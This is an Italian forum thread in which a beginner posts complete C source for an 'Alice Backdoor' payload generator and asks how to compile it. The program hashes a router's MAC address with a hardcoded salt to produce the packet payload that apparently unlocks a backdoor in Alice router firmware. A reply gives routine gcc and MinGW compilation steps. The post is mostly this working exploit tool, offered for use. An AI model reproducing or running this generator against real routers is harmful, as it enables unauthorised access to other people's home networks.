Con quale programma posso compilare codice payload generator

  • 1 Risposte
  • 20426 Visite

0 Utenti e 1 Visitatore stanno visualizzando questo topic.

Offline condor_uk

  • Membro Giovane
  • **
  • 62
Salve ragà,
volevo chiederVi visto che sono alle prime armi quale programma devo utilizzare per
poter compilare il seguente codice sorgente

Codice: [Seleziona]

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet */
/* modified by legolas558 - MAC address can be passed as command line parameter */
/* payload updated by ragequit to support the latest firmware */

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

#define uint32 uint32_t
#define uint8 uint8_t

typedef struct {
  uint32 state[4];           /* state (ABCD) */
  uint32 total[2];           /* number of bits, modulo 2^64 (lsb first) */
  unsigned char buffer[64];  /* input buffer */
} md5_context;

#define GET_UINT32(n,b,i)                       \
{                                               \
    (n) = ( (uint32) (b)[(i)    ]       )       \
        | ( (uint32) (b)[(i) + 1] <<  8 )       \
        | ( (uint32) (b)[(i) + 2] << 16 )       \
        | ( (uint32) (b)[(i) + 3] << 24 );      \
}

#define PUT_UINT32(n,b,i)                       \
{                                               \
    (b)[(i)    ] = (uint8) ( (n)       );       \
    (b)[(i) + 1] = (uint8) ( (n) >>  8 );       \
    (b)[(i) + 2] = (uint8) ( (n) >> 16 );       \
    (b)[(i) + 3] = (uint8) ( (n) >> 24 );       \
}

void md5_starts( md5_context *ctx )
{
    ctx->total[0] = 0;
    ctx->total[1] = 0;

    ctx->state[0] = 0x67452301;
    ctx->state[1] = 0xEFCDAB89;
    ctx->state[2] = 0x98BADCFE;
    ctx->state[3] = 0x10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
    uint32 X[16], A, B, C, D;

    GET_UINT32( X[0],  data,  0 );
    GET_UINT32( X[1],  data,  4 );
    GET_UINT32( X[2],  data,  8 );
    GET_UINT32( X[3],  data, 12 );
    GET_UINT32( X[4],  data, 16 );
    GET_UINT32( X[5],  data, 20 );
    GET_UINT32( X[6],  data, 24 );
    GET_UINT32( X[7],  data, 28 );
    GET_UINT32( X[8],  data, 32 );
    GET_UINT32( X[9],  data, 36 );
    GET_UINT32( X[10], data, 40 );
    GET_UINT32( X[11], data, 44 );
    GET_UINT32( X[12], data, 48 );
    GET_UINT32( X[13], data, 52 );
    GET_UINT32( X[14], data, 56 );
    GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n)))

#define P(a,b,c,d,k,s,t)                                \
{                                                       \
    a += F(b,c,d) + X[k] + t; a = S(a,s) + b;           \
}

    A = ctx->state[0];
    B = ctx->state[1];
    C = ctx->state[2];
    D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

    P( A, B, C, D,  0,  7, 0xD76AA478 );
    P( D, A, B, C,  1, 12, 0xE8C7B756 );
    P( C, D, A, B,  2, 17, 0x242070DB );
    P( B, C, D, A,  3, 22, 0xC1BDCEEE );
    P( A, B, C, D,  4,  7, 0xF57C0FAF );
    P( D, A, B, C,  5, 12, 0x4787C62A );
    P( C, D, A, B,  6, 17, 0xA8304613 );
    P( B, C, D, A,  7, 22, 0xFD469501 );
    P( A, B, C, D,  8,  7, 0x698098D8 );
    P( D, A, B, C,  9, 12, 0x8B44F7AF );
    P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
    P( B, C, D, A, 11, 22, 0x895CD7BE );
    P( A, B, C, D, 12,  7, 0x6B901122 );
    P( D, A, B, C, 13, 12, 0xFD987193 );
    P( C, D, A, B, 14, 17, 0xA679438E );
    P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

    P( A, B, C, D,  1,  5, 0xF61E2562 );
    P( D, A, B, C,  6,  9, 0xC040B340 );
    P( C, D, A, B, 11, 14, 0x265E5A51 );
    P( B, C, D, A,  0, 20, 0xE9B6C7AA );
    P( A, B, C, D,  5,  5, 0xD62F105D );
    P( D, A, B, C, 10,  9, 0x02441453 );
    P( C, D, A, B, 15, 14, 0xD8A1E681 );
    P( B, C, D, A,  4, 20, 0xE7D3FBC8 );
    P( A, B, C, D,  9,  5, 0x21E1CDE6 );
    P( D, A, B, C, 14,  9, 0xC33707D6 );
    P( C, D, A, B,  3, 14, 0xF4D50D87 );
    P( B, C, D, A,  8, 20, 0x455A14ED );
    P( A, B, C, D, 13,  5, 0xA9E3E905 );
    P( D, A, B, C,  2,  9, 0xFCEFA3F8 );
    P( C, D, A, B,  7, 14, 0x676F02D9 );
    P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F
   
#define F(x,y,z) (x ^ y ^ z)

    P( A, B, C, D,  5,  4, 0xFFFA3942 );
    P( D, A, B, C,  8, 11, 0x8771F681 );
    P( C, D, A, B, 11, 16, 0x6D9D6122 );
    P( B, C, D, A, 14, 23, 0xFDE5380C );
    P( A, B, C, D,  1,  4, 0xA4BEEA44 );
    P( D, A, B, C,  4, 11, 0x4BDECFA9 );
    P( C, D, A, B,  7, 16, 0xF6BB4B60 );
    P( B, C, D, A, 10, 23, 0xBEBFBC70 );
    P( A, B, C, D, 13,  4, 0x289B7EC6 );
    P( D, A, B, C,  0, 11, 0xEAA127FA );
    P( C, D, A, B,  3, 16, 0xD4EF3085 );
    P( B, C, D, A,  6, 23, 0x04881D05 );
    P( A, B, C, D,  9,  4, 0xD9D4D039 );
    P( D, A, B, C, 12, 11, 0xE6DB99E5 );
    P( C, D, A, B, 15, 16, 0x1FA27CF8 );
    P( B, C, D, A,  2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

    P( A, B, C, D,  0,  6, 0xF4292244 );
    P( D, A, B, C,  7, 10, 0x432AFF97 );
    P( C, D, A, B, 14, 15, 0xAB9423A7 );
    P( B, C, D, A,  5, 21, 0xFC93A039 );
    P( A, B, C, D, 12,  6, 0x655B59C3 );
    P( D, A, B, C,  3, 10, 0x8F0CCC92 );
    P( C, D, A, B, 10, 15, 0xFFEFF47D );
    P( B, C, D, A,  1, 21, 0x85845DD1 );
    P( A, B, C, D,  8,  6, 0x6FA87E4F );
    P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
    P( C, D, A, B,  6, 15, 0xA3014314 );
    P( B, C, D, A, 13, 21, 0x4E0811A1 );
    P( A, B, C, D,  4,  6, 0xF7537E82 );
    P( D, A, B, C, 11, 10, 0xBD3AF235 );
    P( C, D, A, B,  2, 15, 0x2AD7D2BB );
    P( B, C, D, A,  9, 21, 0xEB86D391 );

#undef F

    ctx->state[0] += A;
    ctx->state[1] += B;
    ctx->state[2] += C;
    ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
    uint32 left, fill;

    if( ! length ) return;

    left = ctx->total[0] & 0x3F;
    fill = 64 - left;

    ctx->total[0] += length;
    ctx->total[0] &= 0xFFFFFFFF;

    if( ctx->total[0] < length )
        ctx->total[1]++;

    if( left && length >= fill )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, fill );
        md5_process( ctx, ctx->buffer );
        length -= fill;
        input  += fill;
        left = 0;
    }

    while( length >= 64 )
    {
        md5_process( ctx, input );
        length -= 64;
        input  += 64;
    }

    if( length )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, length );
    }
}

static uint8 md5_padding[64] =
{
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
    uint32 last, padn;
    uint32 high, low;
    uint8 msglen[8];
   

    high = ( ctx->total[0] >> 29 )
         | ( ctx->total[1] <<  3 );
    low  = ( ctx->total[0] <<  3 );

    PUT_UINT32( low,  msglen, 0 );
    PUT_UINT32( high, msglen, 4 );

    //for(int i=0;i<8;i++) printf("length %d\n",msglen[i]);
   
   last = ctx->total[0] & 0x3F;
    padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last );

    md5_update( ctx, md5_padding, padn );
    md5_update( ctx, msglen, 8 );

    PUT_UINT32( ctx->state[0], digest,  0 );
    PUT_UINT32( ctx->state[1], digest,  4 );
    PUT_UINT32( ctx->state[2], digest,  8 );
    PUT_UINT32( ctx->state[3], digest, 12 );
}

//#ifdef TEST

/* those are the standard RFC 1321 test vector */

static char *msg[] =
{
    "",
    "a",
    "abc",
    "message digest",
    "abcdefghijklmnopqrstuvwxyz",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    "12345678901234567890123456789012345678901234567890123456789012" \
        "345678901234567890"
};

static char *val[] =
{
    "d41d8cd98f00b204e9800998ecf8427e",
    "0cc175b9c0f1b6a831c399e269772661",
    "900150983cd24fb0d6963f7d28e17f72",
    "f96b697d7cb7938d525a2f31aaf161d0",
    "c3fcd3d76192e4007dfb496cca67e13b",
    "d174ab98d277d9f5a5611c2c9f419d9f",
    "57edf4a22be3c955ac49da2e2107b67a"
};

const char MAC_MASK[] =   "%2x%*1c%2x%*1c%2x%*1c%2x%*1c%2x%*1c%2x";

static char saltOrig[] =
{0x1F,0x94,0x04,0x0E,0xAB,0xEC,0xAA,0x01,0x09,0x6D,0x76,0xEC,0xB6,0x16,0xEF,0x71,0x6B,0xA6,0x5B,0x3B,0x99,0x29,0x5A,0x02,0xBF,0x4C,0xD0,0x74,0x2C,0x23,0x95,0x4B,0x87,0xFC,0x1E,0xAF,0x83,0x2F,0xA8,0x1F,0x2F,0x15,0xC9,0x0F,0x46,0x3A,0xA1,0x2F,0xA5,0x71,0x30,0x2E,0x77,0x58,0xB8,0xD1,0x9F,0x87,0x2A,0x65,0xB9,0xDA,0x46,0xDD,0xDB,0x67,0x7B,0x61,0xA1,0x34,0x54,0x74,0xD2,0x84,0x68,0xBF,0xF7,0x29,0x79,0x42,0x89,0xC9,0xD8,0xBE,0xF7,0xFF,0xC7,0x75,0x7E,0x74,0xD7,0x3F,0x8C,0xBA,0xAE,0x0D,0xF5,0x05,0xD5,0xAE,0xC0,0xC3,0xBE,0xEF,0xEE,0xCC,0xED,0xF2,0xBC,0x9C,0x0B,0xD4,0x35,0x56,0x46,0x60,0xA9,0xF1,0xFE,0x60,0x69,0xCC,0x1D,0xA0,0x0F,0x60,0xAE,0x06,0xB5,0x13,0xB7,0xB4,0x4B,0x09,0x01,0x9C,0x8F,0x45,0x82,0xFB,0x76,0xCE,0xDF,0x1D,0xD4,0x49,0xC3,0xFB,0x24,0xE6,0x51,0xD5,0x7E,0x32,0xE5,0xFE,0x66,0x4A,0x3E,0x40,0x89,0xA7,0x9A,0x91,0x3E,0x6A,0x01,0xD1,0xB6,0x12,0xA9,0xDE,0xEC,0x11,0x6D,0xA0,0x0E,0x80,0xF1,0xD4,0xD2,0x18,0x9F,0x44,0x28,0xF9,0xA5,0x75,0xC4,0x2D,0xBF,0x5D,0xE5,0x83,0x4C,0x1C,0xB0,0xB9,0x20,0x20,0x96,0xE4,0x20,0x23,0x97,0x43,0x12,0x85,0x13,0x17,0xF9,0x77,0x8E,0x6A,0x64,0x50,0xCB,0x97,0x87,0x2F,0x66,0xD1,0xE0,0x54,0x89,0x52,0xCD,0xE4,0xC3,0xDB,0x42,0x9E,0xC7,0xF8,0x32,0x35,0x9E,0x0B,0xAE,0x02,0x10,0x1A,0xA6,0xBA,0x14,0x33,0xCB,0x62,0x08,0x1C,0xF2,0x8D,0xFF,0xD2,0x62,0x6B};

int main( int argc, char *argv[] ) {
   system("color 0a");
   int i, j;
   char output[33];
   md5_context ctx;
   unsigned char md5sum[16];
   unsigned char salt[256];
   printf(   "Alice BackDoor hash creator by saxdax & drPepperOne\n"
         "Modified by legolas558\n"
         "Payload updated by ragequit (4.5.0sx)\n\n");
   if( argc < 2 ) {
      printf( "\n Usage: %s MAC\n\nSpecify MAC address as 00-00-00-00-00-00 or 00:00:00:00:00:00\n\n", argv[0]);
      return 0;
   }
   

   // convert MAC address to binary
   uint8   mac[6];
   i = sscanf_s(argv[1], MAC_MASK, &mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5] );
   if (i != 6) {
      fprintf(stderr, "Invalid MAC address specified\n");
      return -1;
   }
   
   md5_starts( &ctx );

   md5_update( &ctx, mac, sizeof(mac) );
   
   memcpy(salt, saltOrig, 256);
   
   md5_update( &ctx, salt, 256);

   md5_finish( &ctx, md5sum );
   
   printf("Payload is:\n");
   for( j = 0; j < 8; j++ ) {
      printf( "%02x", md5sum[j] );
   }
   printf("\n");
   return ( 0 );
}

avevo scaricato Netbeans ma non so con quale linguaggio compilare il programma.

Mi dareste una mano con una guida ?

Confido in voi ;)

Saluti

Offline nirvana1289

  • Nuovo Iscritto
  • *
  • 2
Re:Con quale programma posso compilare codice payload generator
« Risposta #1 il: 23 Gennaio 2012, 17:30 »
Molto semplice:

Il codice che hai postato è un pezzo di codice completo di main (a occhio e croce in puro C).

Per compilarlo con un ambiente unix, hai bisogno di un compilatore, solitamente si usa gcc. Per una distribuzione che ha apt come gestore dei pacchetti, puoi installarlo molto semplicemente mediante il comando
Codice: [Seleziona]
# apt-get install gcce compilarlo con il comando
Codice: [Seleziona]
$ gcc /posizione/del/file/file.c -o /posizione/del/file/filegcc accetta anche posizioni relative, percui puoi compilarlo spostandoti prima nella directory che lo contiene
Codice: [Seleziona]
$ cd /posizione/del/file
/posizione/del/file $ gcc file.c -o file
/posizione/del/file $ ./file

Per windows i concetti sono abbastanza simili, solo che devi installare minGW, che contiene l'applicativo gcc.exe per compilare sotto windows. Lo puoi trovare qui:
http://sourceforge.net/projects/mingw/files/Installer/mingw-get-inst/
e la spiegazione dettagliata della installazione automatica è qui:
http://www.mingw.org/wiki/Getting_Started
http://www.mingw.org/wiki/InstallationHOWTOforMinGW
Una volta installato, la procedura di compilazione è praticamente uguale, ma invece che il terminale bash, dovrai utilizzare il prompt dei comandi

In alternativa sotto windows puoi utilizzare anche DevC++ (http://www.bloodshed.net/devcpp.html) un IDE completo di compilatore (gcc sempre da minGW)